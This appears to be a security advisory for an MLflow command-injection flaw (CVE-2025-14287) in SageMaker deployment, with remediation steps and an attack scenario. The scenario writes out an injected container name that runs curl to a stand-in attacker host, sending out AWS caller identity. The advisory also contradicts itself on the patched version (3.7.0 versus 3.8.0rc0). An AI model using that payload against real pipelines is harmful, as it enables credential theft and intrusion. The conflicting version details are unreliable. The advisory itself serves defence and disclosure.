MLflow users on any version before 3.7.0 deploying to AWS SageMaker are exposed to command injection via unsanitized container image names passed to os.system(). Patch immediately to v3.7.0+ and audit CI/CD pipelines that accept external input for the --container parameter. Until patched, restrict who can invoke MLflow SageMaker CLI commands and treat any container name input from untrusted sources as hostile.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| mlflow | pip | < 3.8.0rc0 | 3.8.0rc0 |
Do you use mlflow? You're affected.
Severity & Risk
Recommended Action
- 1) PATCH: Upgrade MLflow to v3.7.0 or later immediately — this is the only full remediation. 2) DETECT: Search logs for anomalous shell metacharacters (;, |, $(), backticks, &&) in MLflow CLI invocations targeting the --container parameter. 3) WORKAROUND (if patch is blocked): Implement input validation at the CI/CD layer rejecting any container image name not matching a strict allowlist pattern (e.g., ^[a-zA-Z0-9_.-/:]+ $). 4) HARDEN: Run MLflow processes under least-privilege IAM roles; ensure no long-lived AWS credentials are present in the execution environment. 5) AUDIT: Review all pipeline configs that pass dynamic values to mlflow sagemaker deploy --container and trace the origin of each value to assess exposure.
Classification
Compliance Impact
This CVE is relevant to:
Technical Details
NVD Description
A command injection vulnerability exists in mlflow/mlflow versions before v3.7.0, specifically in the `mlflow/sagemaker/__init__.py` file at lines 161-167. The vulnerability arises from the direct interpolation of user-supplied container image names into shell commands without proper sanitization, which are then executed using `os.system()`. This allows attackers to execute arbitrary commands by supplying malicious input through the `--container` parameter of the CLI. The issue affects environments where MLflow is used, including development setups, CI/CD pipelines, and cloud deployments.
Exploitation Scenario
An adversary with write access to a Git repository (via compromised developer credentials or a malicious PR) modifies the CI/CD pipeline configuration to pass a crafted container image name such as legitimate-image:latest; curl -s http://attacker.com/$(aws sts get-caller-identity | base64) to the MLflow SageMaker deployment command. When the pipeline triggers, MLflow interpolates the unsanitized string directly into an os.system() call, executing the injected command in the context of the CI runner. The attacker receives AWS caller identity (credentials), then uses them to access S3 model buckets, enumerate SageMaker endpoints, and exfiltrate or replace production model artifacts. No user interaction beyond the normal pipeline execution is required.
Weaknesses (CWE)
CVSS Vector
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H References
- github.com/advisories/GHSA-xch3-2f9x-wh9f
- github.com/advisories/GHSA-xch3-2f9x-wh9f
- github.com/advisories/GHSA-xch3-2f9x-wh9f
- github.com/mlflow/mlflow/commit/8b8792a7034fb33a14b0b31cabcaa9b912d3485f
- github.com/mlflow/mlflow/commit/8b8792a7034fb33a14b0b31cabcaa9b912d3485f
- github.com/mlflow/mlflow/commit/8b8792a7034fb33a14b0b31cabcaa9b912d3485f
- github.com/mlflow/mlflow/pull/19277
- github.com/mlflow/mlflow/pull/19277
- github.com/mlflow/mlflow/pull/19277
- github.com/mlflow/mlflow/releases/tag/v3.8.0rc0
- github.com/mlflow/mlflow/releases/tag/v3.8.0rc0
- github.com/mlflow/mlflow/releases/tag/v3.8.0rc0
- huntr.com/bounties/229cd526-41aa-4819-b6f0-e2d0371c89e3
- huntr.com/bounties/229cd526-41aa-4819-b6f0-e2d0371c89e3
- huntr.com/bounties/229cd526-41aa-4819-b6f0-e2d0371c89e3
- nvd.nist.gov/vuln/detail/CVE-2025-14287
- nvd.nist.gov/vuln/detail/CVE-2025-14287
- nvd.nist.gov/vuln/detail/CVE-2025-14287
- huntr.com/bounties/229cd526-41aa-4819-b6f0-e2d0371c89e3
- huntr.com/bounties/229cd526-41aa-4819-b6f0-e2d0371c89e3
- huntr.com/bounties/229cd526-41aa-4819-b6f0-e2d0371c89e3
- huntr.com/bounties/229cd526-41aa-4819-b6f0-e2d0371c89e3